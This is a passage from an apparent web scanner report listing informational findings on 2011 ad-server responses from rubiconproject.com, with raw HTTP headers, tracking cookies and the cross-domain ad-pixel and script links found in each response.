Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:14 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:14 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:14:14 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^1&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63945; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2974

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=da822447-f000-423f-aea8-003380d22acd&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4BWZRtpb8x4mYKumUK.vdSE.8Ako8A8t72sI7XJjBKADXSKkXWDDP3UU5VLW44y_zMKKpA6DKbx5KcZnk005GWPzuzMV0RRCd.7.sidmJltfXfH8lVGuw-%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4BWZRtpb8x4mYKumUK.vdSE.8Ako8A8t72sI7XJjBKADXSKkXWDDP3UU5VLW44y_zMKKpA6DKbx5KcZnk005GWPzuzMV0RRCd.7.sidmJltfXfH8lVGuw-&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=da822447-f000-423f-aea8-003380d22acd">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=da822447-f000-423f-aea8-003380d22acd"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.679912&ex_uid=9_154e62c97432177b6a4bcd01&creativeID=147856&message=eJwVjDEOwzAMA78SaK4BWZRtpb8x4mYKumUK.vdSE.8Ako8A8t72sI7XJjBKADXSKkXWDDP3UU5VLW44y_zMKKpA6DKbx5KcZnk005GWPzuzMV0RRCd.7.sidmJltfXfH8lVGuw-&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.62. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

The response contains the following links to other domains:

http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01
http://uac.advertising.com/wrapper/aceUAC.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:31 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^5&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196947.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1858

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

<img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.63. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.6520654342602938&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=b7b37ac8-c4ca-4367-bbe2-2919639c993e&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOgDAMQ6.CMlOJxm0.3IZWbIiNCXF3ksnvSbZfAmhf3FiwLgQOMaBaWg2hoQN6TCuzzaM0iJYxTi7s1QU.3XFSTrOsnTdNyx.P7JFtgwW2wPu5rkAJrFHt8v3wRhtJ%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=b7b37ac8-c4ca-4367-bbe2-2919639c993e
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOgDAMQ6.CMlOJxm0.3IZWbIiNCXF3ksnvSbZfAmhf3FiwLgQOMaBaWg2hoQN6TCuzzaM0iJYxTi7s1QU.3XFSTrOsnTdNyx.P7JFtgwW2wPu5rkAJrFHt8v3wRhtJ&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=b7b37ac8-c4ca-4367-bbe2-2919639c993e
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.619859&creativeID=147856&message=eJwVjDsOgDAMQ6.CMlOJxm0.3IZWbIiNCXF3ksnvSbZfAmhf3FiwLgQOMaBaWg2hoQN6TCuzzaM0iJYxTi7s1QU.3XFSTrOsnTdNyx.P7JFtgwW2wPu5rkAJrFHt8v3wRhtJ&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:21:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^12&12590^84; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63532; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2928

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=b7b37ac8-c4ca-4367-bbe2-2919639c993e&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOgDAMQ6.CMlOJxm0.3IZWbIiNCXF3ksnvSbZfAmhf3FiwLgQOMaBaWg2hoQN6TCuzzaM0iJYxTi7s1QU.3XFSTrOsnTdNyx.P7JFtgwW2wPu5rkAJrFHt8v3wRhtJ%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOgDAMQ6.CMlOJxm0.3IZWbIiNCXF3ksnvSbZfAmhf3FiwLgQOMaBaWg2hoQN6TCuzzaM0iJYxTi7s1QU.3XFSTrOsnTdNyx.P7JFtgwW2wPu5rkAJrFHt8v3wRhtJ&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=b7b37ac8-c4ca-4367-bbe2-2919639c993e">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=b7b37ac8-c4ca-4367-bbe2-2919639c993e"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.619859&creativeID=147856&message=eJwVjDsOgDAMQ6.CMlOJxm0.3IZWbIiNCXF3ksnvSbZfAmhf3FiwLgQOMaBaWg2hoQN6TCuzzaM0iJYxTi7s1QU.3XFSTrOsnTdNyx.P7JFtgwW2wPu5rkAJrFHt8v3wRhtJ&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.64. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=517297b7-81f8-4c9d-83e0-6fc052f666fd&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDkOxDAMA78SqI4BS7IO5zk5XAXpUgX796UrzgAkP1KlbekprutCKpBU5WwwhpBxSI89SvLI0o5.ltSrFh9HNRnuPk6a01kOkxrT5k9HGrJVTWADPu99Ax3IqBr__sizGvE-%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=517297b7-81f8-4c9d-83e0-6fc052f666fd
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDkOxDAMA78SqI4BS7IO5zk5XAXpUgX796UrzgAkP1KlbekprutCKpBU5WwwhpBxSI89SvLI0o5.ltSrFh9HNRnuPk6a01kOkxrT5k9HGrJVTWADPu99Ax3IqBr__sizGvE-&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=517297b7-81f8-4c9d-83e0-6fc052f666fd
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.710000&creativeID=147857&message=eJwVjDkOxDAMA78SqI4BS7IO5zk5XAXpUgX796UrzgAkP1KlbekprutCKpBU5WwwhpBxSI89SvLI0o5.ltSrFh9HNRnuPk6a01kOkxrT5k9HGrJVTWADPu99Ax3IqBr__sizGvE-&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^3; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:43 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:14:43 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^85&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63916; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=517297b7-81f8-4c9d-83e0-6fc052f666fd&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDkOxDAMA78SqI4BS7IO5zk5XAXpUgX796UrzgAkP1KlbekprutCKpBU5WwwhpBxSI89SvLI0o5.ltSrFh9HNRnuPk6a01kOkxrT5k9HGrJVTWADPu99Ax3IqBr__sizGvE-%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDkOxDAMA78SqI4BS7IO5zk5XAXpUgX796UrzgAkP1KlbekprutCKpBU5WwwhpBxSI89SvLI0o5.ltSrFh9HNRnuPk6a01kOkxrT5k9HGrJVTWADPu99Ax3IqBr__sizGvE-&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=517297b7-81f8-4c9d-83e0-6fc052f666fd">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=517297b7-81f8-4c9d-83e0-6fc052f666fd"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.710000&creativeID=147857&message=eJwVjDkOxDAMA78SqI4BS7IO5zk5XAXpUgX796UrzgAkP1KlbekprutCKpBU5WwwhpBxSI89SvLI0o5.ltSrFh9HNRnuPk6a01kOkxrT5k9HGrJVTWADPu99Ax3IqBr__sizGvE-&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.65. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=78d7f6f8-4a94-49f1-bd08-568086a90b2d&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDEOwzAMA78SaK4ByZJlqb9JYHgKsmUq.vfQmXgHkPyRKn23jOr62UgrJFQlDCYQ6jH69BnF9rRiOaUcg6M0Dw7fk486aE3fcqvcl62fRDaksQbQgNd9nkAHCqpN_g_SKxrx%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=78d7f6f8-4a94-49f1-bd08-568086a90b2d
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDEOwzAMA78SaK4ByZJlqb9JYHgKsmUq.vfQmXgHkPyRKn23jOr62UgrJFQlDCYQ6jH69BnF9rRiOaUcg6M0Dw7fk486aE3fcqvcl62fRDaksQbQgNd9nkAHCqpN_g_SKxrx&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=78d7f6f8-4a94-49f1-bd08-568086a90b2d
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwdjDEOwzAMA78SaK4ByZJlqb9JYHgKsmUq.vfQmXgHkPyRKn23jOr62UgrJFQlDCYQ6jH69BnF9rRiOaUcg6M0Dw7fk486aE3fcqvcl62fRDaksQbQgNd9nkAHCqpN_g_SKxrx&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk2=0; ses2=12338^7&12590^3; rdk=7856/12590; rdk15=0; ses15=12338^5&12590^5

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:18:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:18:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^34&12590^7; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63681; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=78d7f6f8-4a94-49f1-bd08-568086a90b2d&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDEOwzAMA78SaK4ByZJlqb9JYHgKsmUq.vfQmXgHkPyRKn23jOr62UgrJFQlDCYQ6jH69BnF9rRiOaUcg6M0Dw7fk486aE3fcqvcl62fRDaksQbQgNd9nkAHCqpN_g_SKxrx%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDEOwzAMA78SaK4ByZJlqb9JYHgKsmUq.vfQmXgHkPyRKn23jOr62UgrJFQlDCYQ6jH69BnF9rRiOaUcg6M0Dw7fk486aE3fcqvcl62fRDaksQbQgNd9nkAHCqpN_g_SKxrx&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=78d7f6f8-4a94-49f1-bd08-568086a90b2d">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=78d7f6f8-4a94-49f1-bd08-568086a90b2d"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwdjDEOwzAMA78SaK4ByZJlqb9JYHgKsmUq.vfQmXgHkPyRKn23jOr62UgrJFQlDCYQ6jH69BnF9rRiOaUcg6M0Dw7fk486aE3fcqvcl62fRDaksQbQgNd9nkAHCqpN_g_SKxrx&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.66. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.6706412732601166&keyword=wa/news_home

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=38ff2596-849f-413c-a1a5-af80ea37249b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4By5Rsqb9xi3oKumUK.vfSE.8AkrcA8jwyWsfjEDRKABpGU4og1mqevYTlKqZ4l6nTy1xRPxOjWb5kT3d5eKtj2_5JpjOtIohG_F7nSexEZdX19wfXYBsR%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=38ff2596-849f-413c-a1a5-af80ea37249b
